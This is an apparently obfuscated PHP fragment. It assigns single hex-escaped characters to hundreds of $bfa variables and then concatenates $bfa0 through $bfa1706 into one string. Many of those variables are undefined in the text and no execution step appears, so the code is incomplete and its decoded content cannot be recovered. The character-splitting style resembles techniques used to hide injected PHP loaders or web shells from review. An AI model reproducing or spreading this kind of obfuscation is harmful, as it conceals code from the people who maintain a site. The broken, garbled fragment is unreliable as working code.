$bfa120="\x6c";$bfa1713="\x3b";$bfa1380="\x20";$bfa805="\x63";$bfa622="\x28";$bfa789="\x3d";$bfa1531="\x6f";$bfa1007="\x2e";$bfa1623="\x3e";$bfa589="\x5f";$bfa1130="\x28";
$bfa283="\x65";$bfa1022="\x2e";
$bfa697="\x20";$bfa1103="\x66";$bfa681="\x64";$bfa652="\x20";
$bfa93="\x6e";$bfa1172="\x29";$bfa1315="\x20";$bfa1262="\x5b";$bfa983="\x6f";$bfa792="\x29";$bfa1089="\x63";$bfa1499="\x63";$bfa1376="\x20";
$bfa225="\x28";$bfa377="\x6f";$bfa1294="\x73";
$bfa1404="\x72";$bfa620="\x72";
$bfa861="\x20";$bfa603="\x20";
$bfa954="\x28";$bfa413="\x0a";$bfa1567="\x65";$bfa150="\x68";$bfa74="\x67";$bfa1062="\x5c";$bfa81="\x69";$bfa1155="\x20";$bfa143="\x65";$bfa765="\x69";$bfa1460="\x74";$bfa796="\x7d";$bfa872="\x24";$bfa96="\x20";$bfa1328="\x64";$bfa1031="\x24";
$bfa626="\x3d";
$bfa628="\x30";$bfa289="\x69";$bfa14="\x65";$bfa1612="\x63";$bfa1426="\x30";$bfa221="\x72";$bfa371="\x73";$bfa36="\x6e";$bfa1474="\x69";$bfa1204="\x0a";$bfa1598="\x24";$bfa275="\x20";$bfa1230="\x31";$bfa1518="\x65";$bfa1333="\x2b";
$bfa338="\x6f";$bfa54="\x69";
$bfa109="\x65";$bfa185="\x09";$bfa745="\x6d";$bfa1033="\x61";$bfa799="\x09";$bfa1551="\x7a";
$bfa738="\x29";$bfa904="\x24";$bfa233="\x24";$bfa556="\x78";$bfa782="\x2b";$bfa778="\x28";$bfa924="\x09";
$bfa725="\x64";$bfa479="\x6d";$bfa175="\x79";$bfa1340="\x20";
$bfa640="\x63";
$bfa1574="\x74";$bfa877="\x69";
$bfa1577="\x6c";
$bfa1630="\x72";$bfa1392="\x73";$bfa1114="\x73";$bfa636="\x20";$bfa1206="\x09";$bfa1695="\x6e";$bfa191="\x63";$bfa373="\x72";$bfa393="\x75";$bfa75="\x65";$bfa1046="\x24";$bfa1425="\x32";$bfa919="\x2e";$bfa987="\x2e";$bfa1324="\x28";$bfa1641="\x6d";$bfa1418="\x74";
$bfa193="\x69";
$bfa43="\x32";$bfa688="\x25";$bfa1710="\x24";$bfa428="\x20";$bfa1688="\x3b";$bfa1491="\x6f";$bfa1402="\x73";$bfa773="\x28";$bfa591="\x74";$bfa1608="\x74";$bfa593="\x69";
$bfa1534="\x73";$bfa250="\x0a";
$bfa922="\x0a";$bfa1048="\x63";$bfa362="\x72";$bfa59="\x72";$bfa212="\x3d";$bfa1042="\x22";$bfa878="\x70";$bfa379="\x65";$bfa528="\x74";$bfa965="\x29";$bfa1039="\x65";$bfa614="\x22";$bfa1292="\x0a";$bfa1384="\x69";$bfa590="\x73";
$bfa1119="\x66";
$bfa1176="\x09";$bfa1018="\x6f";
$bfa157="\x20";$bfa1267="\x24";$bfa1517="\x6e";$bfa13="\x50";$bfa1106="\x68";$bfa1681="\x24";$bfa389="\x0a";$bfa905="\x24";$bfa444="\x65";
$bfa1490="\x79";$bfa818="\x20";$bfa786="\x29";$bfa1236="\x24";$bfa1634="\x24";$bfa879="\x74";$bfa897="\x65";$bfa1147="\x09";$bfa1637="\x72";$bfa910="\x6e";$bfa1645="\x67";$bfa617="\x09";$bfa182="\x30";
$bfa110="\x73";$bfa712="\x64";$bfa646="\x20";$bfa210="\x73";$bfa364="\x70";$bfa401="\x65";$bfa137="\x0a";$bfa896="\x64";$bfa117="\x20";$bfa386="\x31";$bfa1237="\x6a";$bfa1635="\x76";$bfa126="\x73";$bfa627="\x20";$bfa1504="\x20";$bfa1604="\x70";$bfa446="\x70";$bfa1471="\x75";
$bfa1317="\x6c";$bfa351="\x0a";$bfa582="\x20";$bfa132="\x72";$bfa554="\x64";
$bfa396="\x20";
$bfa11="\x6c";$bfa266="\x61";$bfa443="\x6b";$bfa557="\x65";$bfa758="\x20";$bfa1263="\x24";$bfa1043="\x3b";$bfa845="\x6e";
$bfa883="\x2b";$bfa1001="\x61";$bfa535="\x66";$bfa1203="\x3b";$bfa1477="\x20";$bfa1592="\x6d";$bfa434="\x74";$bfa747="\x6f";
$bfa1210="\x74";$bfa301="\x65";$bfa1307="\x6e";$bfa433="\x70";$bfa478="\x65";$bfa1281="\x20";$bfa588="\x64";$bfa265="\x72";
$bfa1621="\x2c";$bfa437="\x72";$bfa826="\x09";$bfa770="\x69";$bfa1178="\x6d";$bfa44="\x30";
$bfa198="\x20";$bfa298="\x20";$bfa1521="\x74";$bfa764="\x24";$bfa630="\x20";
$bfa214="\x28";$bfa380="\x2c";
$bfa499="\x63";$bfa791="\x30";$bfa1487="\x6e";
$bfa419="\x72";$bfa1374="\x20";$bfa107="\x20";$bfa989="\x20";$bfa133="\x73";$bfa1677="\x20";$bfa1440="\x65";$bfa997="\x61";
$bfa456="\x20";$bfa692="\x5c";$bfa1548="\x2d";$bfa378="\x64";$bfa1670="\x3b";$bfa734="\x5b";
$bfa1065="\x76";$bfa1704="\x0a";$bfa584="\x20";$bfa452="\x6b";
$bfa488="\x61";
$bfa1299="\x61";
$bfa322="\x3b";$bfa142="\x6d";$bfa1336="\x0a";$bfa1000="\x6e";$bfa68="\x63";$bfa447="\x20";
$bfa1354="\x0a";$bfa162="\x65";$bfa522="\x68";$bfa202="\x20";$bfa321="\x30";$bfa323="\x20";$bfa632="\x69";$bfa714="\x78";$bfa748="\x64";$bfa297="\x64";$bfa41="\x29";$bfa1133="\x31";
$bfa1466="\x73";$bfa1375="\x3c";$bfa772="\x74";$bfa783="\x31";$bfa809="\x74";$bfa1699="\x74";$bfa1631="\x70";$bfa1398="\x20";
$bfa1091="\x64";$bfa880="\x3b";$bfa1080="\x72";$bfa1627="\x61";$bfa257="\x6c";$bfa860="\x69";$bfa204="\x69";
$bfa1234="\x2c";$bfa407="\x24";$bfa441="\x2c";
$bfa1157="\x69";$bfa343="\x20";
$bfa277="\x68";$bfa971="\x20";$bfa1160="\x20";$bfa1666="\x20";$bfa1445="\x20";$bfa523="\x65";
$bfa458="\x6f";$bfa295="\x69";$bfa1505="\x63";
$bfa777="\x64";$bfa1401="\x20";$bfa1545="\x6f";$bfa853="\x09";$bfa1029="\x3d";$bfa200="\x29";$bfa771="\x6e";$bfa858="\x28";$bfa196="\x20";$bfa31="\x20";$bfa272="\x74";
$bfa256="\x69";$bfa1228="\x24";$bfa1217="\x20";$bfa767="\x25";
$bfa1084="\x72";$bfa422="\x64";$bfa21="\x65";$bfa600="\x09";$bfa847="\x6d";$bfa1024="\x20";$bfa601="\x6d";$bfa1067="\x72";$bfa171="\x3b";$bfa524="\x72";$bfa1584="\x63";$bfa1297="\x20";
$bfa1461="\x68";$bfa149="\x70";
$bfa66="\x23";$bfa1310="\x7b";$bfa1116="\x73";
$bfa794="\x0a";$bfa1387="\x7b";
$bfa1183="\x20";$bfa1395="\x69";$bfa365="\x74";$bfa320="\x20";$bfa1008="\x22";
$bfa1056="\x22";
$bfa1624="\x6d";$bfa1034="\x72";$bfa754="\x22";$bfa520="\x69";$bfa949="\x20";
$bfa1102="\x20";$bfa1303="\x73";$bfa594="\x6e";$bfa1239="\x20";
$bfa946="\x69";$bfa=$bfa0.
$bfa1.$bfa2.$bfa3.$bfa4.
$bfa5.$bfa6.
$bfa7.$bfa8.$bfa9.$bfa10.$bfa11.$bfa12.
$bfa13.$bfa14.$bfa15.$bfa16.$bfa17.$bfa18.$bfa19.$bfa20.$bfa21.$bfa22.
$bfa23.$bfa24.$bfa25.$bfa26.
$bfa27.$bfa28.$bfa29.$bfa30.$bfa31.$bfa32.$bfa33.
$bfa34.$bfa35.$bfa36.$bfa37.$bfa38.$bfa39.$bfa40.$bfa41.$bfa42.$bfa43.$bfa44.$bfa45.
$bfa46.$bfa47.$bfa48.
$bfa49.$bfa50.
$bfa51.$bfa52.$bfa53.$bfa54.$bfa55.
$bfa56.$bfa57.$bfa58.$bfa59.$bfa60.
$bfa61.$bfa62.$bfa63.
$bfa64.$bfa65.$bfa66.
$bfa67.$bfa68.$bfa69.$bfa70.$bfa71.$bfa72.$bfa73.$bfa74.$bfa75.$bfa76.
$bfa77.
$bfa78.
$bfa79.$bfa80.$bfa81.$bfa82.$bfa83.$bfa84.$bfa85.$bfa86.$bfa87.
$bfa88.$bfa89.$bfa90.
$bfa91.$bfa92.$bfa93.$bfa94.$bfa95.$bfa96.
$bfa97.$bfa98.
$bfa99.$bfa100.
$bfa101.$bfa102.
$bfa103.$bfa104.
$bfa105.$bfa106.$bfa107.$bfa108.
$bfa109.$bfa110.$bfa111.$bfa112.$bfa113.$bfa114.$bfa115.$bfa116.$bfa117.$bfa118.$bfa119.
$bfa120.
$bfa121.$bfa122.$bfa123.$bfa124.$bfa125.$bfa126.$bfa127.$bfa128.$bfa129.$bfa130.
$bfa131.$bfa132.$bfa133.$bfa134.
$bfa135.$bfa136.$bfa137.$bfa138.$bfa139.$bfa140.
$bfa141.$bfa142.$bfa143.
$bfa144.
$bfa145.$bfa146.$bfa147.$bfa148.$bfa149.$bfa150.$bfa151.$bfa152.$bfa153.$bfa154.$bfa155.$bfa156.
$bfa157.$bfa158.$bfa159.$bfa160.
$bfa161.$bfa162.
$bfa163.$bfa164.$bfa165.
$bfa166.$bfa167.$bfa168.$bfa169.$bfa170.$bfa171.
$bfa172.$bfa173.$bfa174.$bfa175.
$bfa176.$bfa177.$bfa178.$bfa179.$bfa180.$bfa181.$bfa182.
$bfa183.$bfa184.$bfa185.$bfa186.$bfa187.$bfa188.$bfa189.$bfa190.$bfa191.$bfa192.
$bfa193.$bfa194.$bfa195.
$bfa196.$bfa197.$bfa198.
$bfa199.$bfa200.$bfa201.$bfa202.$bfa203.$bfa204.
$bfa205.$bfa206.$bfa207.$bfa208.$bfa209.$bfa210.$bfa211.$bfa212.$bfa213.$bfa214.$bfa215.$bfa216.
$bfa217.$bfa218.$bfa219.$bfa220.$bfa221.$bfa222.$bfa223.$bfa224.
$bfa225.$bfa226.$bfa227.
$bfa228.$bfa229.$bfa230.
$bfa231.$bfa232.$bfa233.$bfa234.
$bfa235.$bfa236.$bfa237.$bfa238.$bfa239.$bfa240.
$bfa241.$bfa242.$bfa243.$bfa244.$bfa245.$bfa246.
$bfa247.$bfa248.$bfa249.$bfa250.$bfa251.$bfa252.
$bfa253.$bfa254.$bfa255.$bfa256.
$bfa257.$bfa258.$bfa259.$bfa260.$bfa261.$bfa262.$bfa263.$bfa264.$bfa265.$bfa266.$bfa267.$bfa268.$bfa269.$bfa270.
$bfa271.$bfa272.
$bfa273.$bfa274.$bfa275.$bfa276.$bfa277.$bfa278.$bfa279.$bfa280.
$bfa281.$bfa282.
$bfa283.$bfa284.$bfa285.$bfa286.$bfa287.$bfa288.
$bfa289.$bfa290.
$bfa291.
$bfa292.$bfa293.$bfa294.$bfa295.
$bfa296.
$bfa297.$bfa298.$bfa299.$bfa300.$bfa301.$bfa302.$bfa303.
$bfa304.$bfa305.$bfa306.
$bfa307.$bfa308.
$bfa309.
$bfa310.$bfa311.$bfa312.
$bfa313.$bfa314.$bfa315.$bfa316.
$bfa317.$bfa318.
$bfa319.$bfa320.$bfa321.$bfa322.$bfa323.$bfa324.
$bfa325.$bfa326.
$bfa327.$bfa328.
$bfa329.$bfa330.
$bfa331.$bfa332.$bfa333.$bfa334.$bfa335.
$bfa336.
$bfa337.$bfa338.$bfa339.$bfa340.$bfa341.$bfa342.$bfa343.$bfa344.$bfa345.$bfa346.$bfa347.$bfa348.$bfa349.$bfa350.
$bfa351.$bfa352.$bfa353.$bfa354.
$bfa355.$bfa356.$bfa357.$bfa358.$bfa359.$bfa360.
$bfa361.$bfa362.$bfa363.$bfa364.
$bfa365.$bfa366.$bfa367.$bfa368.
$bfa369.$bfa370.$bfa371.$bfa372.$bfa373.$bfa374.$bfa375.
$bfa376.$bfa377.
$bfa378.$bfa379.$bfa380.
$bfa381.
$bfa382.$bfa383.$bfa384.$bfa385.
$bfa386.
$bfa387.
$bfa388.$bfa389.$bfa390.
$bfa391.$bfa392.$bfa393.$bfa394.$bfa395.$bfa396.$bfa397.$bfa398.$bfa399.$bfa400.$bfa401.$bfa402.$bfa403.$bfa404.$bfa405.
$bfa406.$bfa407.
$bfa408.
$bfa409.$bfa410.$bfa411.$bfa412.$bfa413.$bfa414.$bfa415.$bfa416.$bfa417.
$bfa418.$bfa419.$bfa420.$bfa421.$bfa422.$bfa423.$bfa424.$bfa425.$bfa426.$bfa427.$bfa428.$bfa429.
$bfa430.$bfa431.$bfa432.$bfa433.$bfa434.$bfa435.
$bfa436.$bfa437.
$bfa438.$bfa439.$bfa440.$bfa441.$bfa442.$bfa443.$bfa444.
$bfa445.$bfa446.$bfa447.$bfa448.
$bfa449.$bfa450.$bfa451.$bfa452.$bfa453.$bfa454.$bfa455.$bfa456.$bfa457.$bfa458.$bfa459.
$bfa460.$bfa461.$bfa462.
$bfa463.$bfa464.$bfa465.$bfa466.
$bfa467.$bfa468.
$bfa469.
$bfa470.
$bfa471.$bfa472.
$bfa473.$bfa474.$bfa475.$bfa476.$bfa477.$bfa478.$bfa479.$bfa480.$bfa481.$bfa482.$bfa483.$bfa484.$bfa485.$bfa486.
$bfa487.$bfa488.$bfa489.$bfa490.$bfa491.$bfa492.$bfa493.$bfa494.$bfa495.
$bfa496.
$bfa497.$bfa498.$bfa499.$bfa500.$bfa501.$bfa502.$bfa503.$bfa504.$bfa505.$bfa506.$bfa507.$bfa508.$bfa509.$bfa510.$bfa511.$bfa512.$bfa513.$bfa514.$bfa515.$bfa516.$bfa517.$bfa518.
$bfa519.$bfa520.
$bfa521.$bfa522.$bfa523.$bfa524.$bfa525.$bfa526.$bfa527.
$bfa528.
$bfa529.$bfa530.$bfa531.$bfa532.
$bfa533.$bfa534.$bfa535.$bfa536.$bfa537.$bfa538.$bfa539.$bfa540.
$bfa541.$bfa542.
$bfa543.$bfa544.$bfa545.$bfa546.
$bfa547.$bfa548.$bfa549.$bfa550.$bfa551.$bfa552.
$bfa553.$bfa554.$bfa555.$bfa556.
$bfa557.$bfa558.$bfa559.
$bfa560.
$bfa561.$bfa562.
$bfa563.$bfa564.$bfa565.$bfa566.$bfa567.
$bfa568.$bfa569.$bfa570.
$bfa571.$bfa572.$bfa573.$bfa574.$bfa575.$bfa576.
$bfa577.$bfa578.$bfa579.$bfa580.$bfa581.$bfa582.$bfa583.$bfa584.$bfa585.$bfa586.$bfa587.$bfa588.$bfa589.$bfa590.$bfa591.$bfa592.
$bfa593.$bfa594.$bfa595.$bfa596.$bfa597.$bfa598.$bfa599.$bfa600.
$bfa601.$bfa602.
$bfa603.$bfa604.$bfa605.$bfa606.
$bfa607.$bfa608.$bfa609.
$bfa610.
$bfa611.$bfa612.$bfa613.$bfa614.$bfa615.$bfa616.$bfa617.$bfa618.
$bfa619.$bfa620.$bfa621.
$bfa622.$bfa623.$bfa624.
$bfa625.$bfa626.$bfa627.$bfa628.$bfa629.$bfa630.
$bfa631.$bfa632.$bfa633.
$bfa634.$bfa635.$bfa636.$bfa637.
$bfa638.$bfa639.
$bfa640.
$bfa641.$bfa642.$bfa643.$bfa644.$bfa645.$bfa646.$bfa647.$bfa648.$bfa649.$bfa650.
$bfa651.$bfa652.$bfa653.$bfa654.$bfa655.$bfa656.$bfa657.$bfa658.
$bfa659.$bfa660.
$bfa661.$bfa662.$bfa663.$bfa664.$bfa665.$bfa666.
$bfa667.$bfa668.$bfa669.$bfa670.$bfa671.$bfa672.$bfa673.$bfa674.$bfa675.$bfa676.$bfa677.$bfa678.
$bfa679.$bfa680.$bfa681.$bfa682.$bfa683.$bfa684.
$bfa685.$bfa686.$bfa687.
$bfa688.
$bfa689.$bfa690.$bfa691.$bfa692.$bfa693.$bfa694.$bfa695.$bfa696.
$bfa697.$bfa698.$bfa699.$bfa700.$bfa701.$bfa702.$bfa703.$bfa704.
$bfa705.$bfa706.$bfa707.$bfa708.$bfa709.$bfa710.$bfa711.$bfa712.$bfa713.$bfa714.$bfa715.
$bfa716.$bfa717.$bfa718.$bfa719.$bfa720.
$bfa721.$bfa722.$bfa723.$bfa724.$bfa725.$bfa726.$bfa727.$bfa728.$bfa729.$bfa730.
$bfa731.$bfa732.$bfa733.$bfa734.$bfa735.$bfa736.
$bfa737.$bfa738.$bfa739.$bfa740.$bfa741.$bfa742.$bfa743.$bfa744.$bfa745.$bfa746.$bfa747.$bfa748.
$bfa749.
$bfa750.
$bfa751.$bfa752.
$bfa753.$bfa754.$bfa755.$bfa756.$bfa757.$bfa758.$bfa759.$bfa760.
$bfa761.$bfa762.$bfa763.$bfa764.$bfa765.$bfa766.$bfa767.$bfa768.
$bfa769.$bfa770.$bfa771.$bfa772.
$bfa773.$bfa774.$bfa775.$bfa776.$bfa777.$bfa778.$bfa779.$bfa780.
$bfa781.$bfa782.$bfa783.$bfa784.
$bfa785.$bfa786.$bfa787.$bfa788.
$bfa789.$bfa790.
$bfa791.$bfa792.
$bfa793.$bfa794.$bfa795.
$bfa796.$bfa797.$bfa798.$bfa799.$bfa800.
$bfa801.$bfa802.$bfa803.$bfa804.$bfa805.$bfa806.$bfa807.$bfa808.$bfa809.$bfa810.$bfa811.$bfa812.
$bfa813.$bfa814.$bfa815.$bfa816.$bfa817.$bfa818.$bfa819.$bfa820.$bfa821.$bfa822.$bfa823.$bfa824.$bfa825.$bfa826.
$bfa827.$bfa828.$bfa829.$bfa830.$bfa831.
$bfa832.
$bfa833.
$bfa834.
$bfa835.$bfa836.
$bfa837.$bfa838.
$bfa839.$bfa840.$bfa841.$bfa842.$bfa843.$bfa844.$bfa845.
$bfa846.$bfa847.
$bfa848.
$bfa849.$bfa850.
$bfa851.$bfa852.$bfa853.$bfa854.
$bfa855.$bfa856.$bfa857.$bfa858.$bfa859.$bfa860.$bfa861.$bfa862.$bfa863.$bfa864.
$bfa865.$bfa866.$bfa867.$bfa868.$bfa869.$bfa870.$bfa871.
$bfa872.$bfa873.
$bfa874.$bfa875.$bfa876.$bfa877.$bfa878.
$bfa879.$bfa880.
$bfa881.$bfa882.
$bfa883.$bfa884.$bfa885.
$bfa886.$bfa887.$bfa888.
$bfa889.$bfa890.
$bfa891.
$bfa892.$bfa893.$bfa894.$bfa895.$bfa896.
$bfa897.$bfa898.$bfa899.$bfa900.
$bfa901.$bfa902.$bfa903.$bfa904.$bfa905.$bfa906.$bfa907.$bfa908.$bfa909.$bfa910.$bfa911.$bfa912.$bfa913.$bfa914.$bfa915.$bfa916.$bfa917.$bfa918.$bfa919.$bfa920.$bfa921.
$bfa922.$bfa923.$bfa924.
$bfa925.$bfa926.$bfa927.$bfa928.$bfa929.$bfa930.$bfa931.
$bfa932.$bfa933.$bfa934.$bfa935.$bfa936.$bfa937.$bfa938.
$bfa939.$bfa940.
$bfa941.$bfa942.$bfa943.$bfa944.$bfa945.$bfa946.$bfa947.$bfa948.$bfa949.$bfa950.
$bfa951.$bfa952.
$bfa953.$bfa954.$bfa955.$bfa956.$bfa957.$bfa958.
$bfa959.$bfa960.
$bfa961.$bfa962.$bfa963.$bfa964.$bfa965.$bfa966.$bfa967.$bfa968.$bfa969.
$bfa970.$bfa971.$bfa972.$bfa973.
$bfa974.$bfa975.
$bfa976.
$bfa977.$bfa978.$bfa979.$bfa980.$bfa981.$bfa982.$bfa983.$bfa984.
$bfa985.$bfa986.$bfa987.$bfa988.
$bfa989.$bfa990.
$bfa991.$bfa992.$bfa993.$bfa994.$bfa995.$bfa996.$bfa997.$bfa998.$bfa999.$bfa1000.$bfa1001.$bfa1002.
$bfa1003.$bfa1004.$bfa1005.$bfa1006.$bfa1007.$bfa1008.$bfa1009.$bfa1010.$bfa1011.$bfa1012.$bfa1013.$bfa1014.$bfa1015.$bfa1016.$bfa1017.$bfa1018.
$bfa1019.$bfa1020.$bfa1021.$bfa1022.$bfa1023.$bfa1024.$bfa1025.$bfa1026.
$bfa1027.$bfa1028.$bfa1029.$bfa1030.$bfa1031.$bfa1032.$bfa1033.$bfa1034.$bfa1035.$bfa1036.$bfa1037.
$bfa1038.$bfa1039.$bfa1040.$bfa1041.$bfa1042.
$bfa1043.$bfa1044.
$bfa1045.$bfa1046.$bfa1047.$bfa1048.$bfa1049.$bfa1050.
$bfa1051.$bfa1052.$bfa1053.
$bfa1054.$bfa1055.$bfa1056.$bfa1057.$bfa1058.$bfa1059.$bfa1060.$bfa1061.$bfa1062.$bfa1063.$bfa1064.$bfa1065.$bfa1066.$bfa1067.$bfa1068.$bfa1069.$bfa1070.
$bfa1071.$bfa1072.$bfa1073.$bfa1074.
$bfa1075.$bfa1076.$bfa1077.$bfa1078.$bfa1079.$bfa1080.
$bfa1081.$bfa1082.$bfa1083.$bfa1084.$bfa1085.$bfa1086.
$bfa1087.$bfa1088.
$bfa1089.$bfa1090.$bfa1091.$bfa1092.
$bfa1093.$bfa1094.$bfa1095.$bfa1096.$bfa1097.$bfa1098.$bfa1099.
$bfa1100.$bfa1101.$bfa1102.$bfa1103.$bfa1104.$bfa1105.$bfa1106.$bfa1107.$bfa1108.$bfa1109.$bfa1110.
$bfa1111.$bfa1112.$bfa1113.
$bfa1114.$bfa1115.$bfa1116.$bfa1117.$bfa1118.$bfa1119.
$bfa1120.$bfa1121.$bfa1122.$bfa1123.
$bfa1124.$bfa1125.$bfa1126.$bfa1127.
$bfa1128.$bfa1129.$bfa1130.$bfa1131.$bfa1132.$bfa1133.$bfa1134.
$bfa1135.$bfa1136.$bfa1137.$bfa1138.$bfa1139.$bfa1140.$bfa1141.$bfa1142.$bfa1143.$bfa1144.$bfa1145.$bfa1146.$bfa1147.$bfa1148.$bfa1149.$bfa1150.$bfa1151.$bfa1152.$bfa1153.$bfa1154.$bfa1155.$bfa1156.$bfa1157.
$bfa1158.$bfa1159.
$bfa1160.$bfa1161.$bfa1162.$bfa1163.$bfa1164.
$bfa1165.$bfa1166.
$bfa1167.$bfa1168.$bfa1169.$bfa1170.
$bfa1171.$bfa1172.$bfa1173.
$bfa1174.$bfa1175.$bfa1176.$bfa1177.$bfa1178.$bfa1179.$bfa1180.
$bfa1181.$bfa1182.$bfa1183.$bfa1184.
$bfa1185.
$bfa1186.$bfa1187.$bfa1188.
$bfa1189.$bfa1190.$bfa1191.
$bfa1192.$bfa1193.$bfa1194.$bfa1195.$bfa1196.$bfa1197.$bfa1198.$bfa1199.$bfa1200.$bfa1201.$bfa1202.$bfa1203.$bfa1204.$bfa1205.$bfa1206.$bfa1207.
$bfa1208.$bfa1209.$bfa1210.
$bfa1211.$bfa1212.
$bfa1213.$bfa1214.$bfa1215.
$bfa1216.$bfa1217.$bfa1218.
$bfa1219.$bfa1220.$bfa1221.$bfa1222.$bfa1223.$bfa1224.
$bfa1225.$bfa1226.$bfa1227.$bfa1228.$bfa1229.$bfa1230.$bfa1231.$bfa1232.
$bfa1233.$bfa1234.$bfa1235.$bfa1236.
$bfa1237.$bfa1238.$bfa1239.$bfa1240.
$bfa1241.$bfa1242.$bfa1243.$bfa1244.$bfa1245.$bfa1246.$bfa1247.$bfa1248.$bfa1249.$bfa1250.$bfa1251.$bfa1252.$bfa1253.$bfa1254.
$bfa1255.$bfa1256.$bfa1257.$bfa1258.$bfa1259.
$bfa1260.
$bfa1261.$bfa1262.$bfa1263.$bfa1264.
$bfa1265.$bfa1266.$bfa1267.$bfa1268.$bfa1269.$bfa1270.$bfa1271.$bfa1272.$bfa1273.$bfa1274.$bfa1275.
$bfa1276.$bfa1277.$bfa1278.$bfa1279.$bfa1280.
$bfa1281.$bfa1282.$bfa1283.$bfa1284.
$bfa1285.$bfa1286.$bfa1287.$bfa1288.$bfa1289.$bfa1290.
$bfa1291.$bfa1292.$bfa1293.
$bfa1294.$bfa1295.$bfa1296.
$bfa1297.$bfa1298.$bfa1299.$bfa1300.$bfa1301.$bfa1302.$bfa1303.$bfa1304.$bfa1305.$bfa1306.
$bfa1307.$bfa1308.$bfa1309.$bfa1310.$bfa1311.$bfa1312.$bfa1313.$bfa1314.$bfa1315.$bfa1316.$bfa1317.$bfa1318.$bfa1319.$bfa1320.$bfa1321.
$bfa1322.$bfa1323.$bfa1324.$bfa1325.$bfa1326.$bfa1327.$bfa1328.$bfa1329.$bfa1330.
$bfa1331.$bfa1332.$bfa1333.$bfa1334.$bfa1335.$bfa1336.$bfa1337.$bfa1338.$bfa1339.$bfa1340.$bfa1341.$bfa1342.$bfa1343.$bfa1344.
$bfa1345.$bfa1346.$bfa1347.
$bfa1348.
$bfa1349.$bfa1350.$bfa1351.$bfa1352.$bfa1353.$bfa1354.$bfa1355.$bfa1356.
$bfa1357.$bfa1358.$bfa1359.$bfa1360.$bfa1361.$bfa1362.$bfa1363.$bfa1364.$bfa1365.$bfa1366.$bfa1367.$bfa1368.
$bfa1369.$bfa1370.$bfa1371.$bfa1372.
$bfa1373.$bfa1374.$bfa1375.$bfa1376.
$bfa1377.$bfa1378.$bfa1379.$bfa1380.$bfa1381.$bfa1382.$bfa1383.$bfa1384.$bfa1385.
$bfa1386.$bfa1387.$bfa1388.$bfa1389.$bfa1390.
$bfa1391.$bfa1392.
$bfa1393.$bfa1394.$bfa1395.$bfa1396.$bfa1397.$bfa1398.
$bfa1399.$bfa1400.$bfa1401.
$bfa1402.$bfa1403.
$bfa1404.
$bfa1405.$bfa1406.$bfa1407.$bfa1408.$bfa1409.$bfa1410.
$bfa1411.$bfa1412.$bfa1413.
$bfa1414.$bfa1415.$bfa1416.
$bfa1417.$bfa1418.$bfa1419.$bfa1420.$bfa1421.$bfa1422.$bfa1423.$bfa1424.$bfa1425.$bfa1426.$bfa1427.$bfa1428.$bfa1429.$bfa1430.$bfa1431.
$bfa1432.$bfa1433.$bfa1434.$bfa1435.$bfa1436.$bfa1437.$bfa1438.$bfa1439.$bfa1440.
$bfa1441.$bfa1442.$bfa1443.$bfa1444.
$bfa1445.$bfa1446.
$bfa1447.$bfa1448.$bfa1449.
$bfa1450.$bfa1451.$bfa1452.$bfa1453.$bfa1454.$bfa1455.$bfa1456.
$bfa1457.$bfa1458.$bfa1459.$bfa1460.
$bfa1461.
$bfa1462.$bfa1463.
$bfa1464.$bfa1465.
$bfa1466.$bfa1467.$bfa1468.
$bfa1469.$bfa1470.$bfa1471.
$bfa1472.$bfa1473.$bfa1474.$bfa1475.
$bfa1476.
$bfa1477.$bfa1478.$bfa1479.
$bfa1480.
$bfa1481.
$bfa1482.$bfa1483.$bfa1484.$bfa1485.$bfa1486.$bfa1487.$bfa1488.
$bfa1489.$bfa1490.$bfa1491.
$bfa1492.$bfa1493.$bfa1494.
$bfa1495.$bfa1496.$bfa1497.$bfa1498.$bfa1499.$bfa1500.
$bfa1501.$bfa1502.$bfa1503.$bfa1504.$bfa1505.$bfa1506.
$bfa1507.$bfa1508.$bfa1509.$bfa1510.
$bfa1511.$bfa1512.$bfa1513.$bfa1514.$bfa1515.
$bfa1516.$bfa1517.$bfa1518.$bfa1519.$bfa1520.
$bfa1521.$bfa1522.$bfa1523.$bfa1524.$bfa1525.$bfa1526.
$bfa1527.$bfa1528.$bfa1529.$bfa1530.$bfa1531.$bfa1532.$bfa1533.$bfa1534.$bfa1535.$bfa1536.
$bfa1537.
$bfa1538.$bfa1539.$bfa1540.
$bfa1541.$bfa1542.$bfa1543.$bfa1544.$bfa1545.$bfa1546.$bfa1547.$bfa1548.$bfa1549.$bfa1550.$bfa1551.$bfa1552.$bfa1553.$bfa1554.
$bfa1555.$bfa1556.$bfa1557.$bfa1558.$bfa1559.$bfa1560.
$bfa1561.$bfa1562.$bfa1563.
$bfa1564.$bfa1565.$bfa1566.
$bfa1567.$bfa1568.$bfa1569.$bfa1570.$bfa1571.$bfa1572.$bfa1573.$bfa1574.$bfa1575.$bfa1576.$bfa1577.$bfa1578.$bfa1579.$bfa1580.$bfa1581.$bfa1582.
$bfa1583.$bfa1584.
$bfa1585.$bfa1586.$bfa1587.$bfa1588.$bfa1589.$bfa1590.
$bfa1591.$bfa1592.$bfa1593.$bfa1594.$bfa1595.$bfa1596.$bfa1597.$bfa1598.
$bfa1599.$bfa1600.
$bfa1601.$bfa1602.$bfa1603.$bfa1604.$bfa1605.$bfa1606.$bfa1607.$bfa1608.$bfa1609.$bfa1610.$bfa1611.$bfa1612.$bfa1613.$bfa1614.$bfa1615.
$bfa1616.
$bfa1617.$bfa1618.$bfa1619.$bfa1620.
$bfa1621.$bfa1622.$bfa1623.
$bfa1624.$bfa1625.$bfa1626.
$bfa1627.$bfa1628.$bfa1629.$bfa1630.$bfa1631.
$bfa1632.$bfa1633.$bfa1634.$bfa1635.$bfa1636.$bfa1637.$bfa1638.
$bfa1639.$bfa1640.
$bfa1641.$bfa1642.
$bfa1643.$bfa1644.$bfa1645.
$bfa1646.$bfa1647.$bfa1648.$bfa1649.$bfa1650.
$bfa1651.$bfa1652.$bfa1653.$bfa1654.$bfa1655.$bfa1656.$bfa1657.$bfa1658.$bfa1659.$bfa1660.
$bfa1661.
$bfa1662.$bfa1663.$bfa1664.$bfa1665.$bfa1666.
$bfa1667.
$bfa1668.$bfa1669.
$bfa1670.$bfa1671.$bfa1672.$bfa1673.$bfa1674.$bfa1675.
$bfa1676.$bfa1677.$bfa1678.$bfa1679.$bfa1680.$bfa1681.$bfa1682.$bfa1683.$bfa1684.$bfa1685.$bfa1686.$bfa1687.$bfa1688.$bfa1689.$bfa1690.$bfa1691.$bfa1692.
$bfa1693.$bfa1694.$bfa1695.$bfa1696.
$bfa1697.$bfa1698.$bfa1699.$bfa1700.$bfa1701.$bfa1702.$bfa1703.$bfa1704.$bfa1705.$bfa1706.
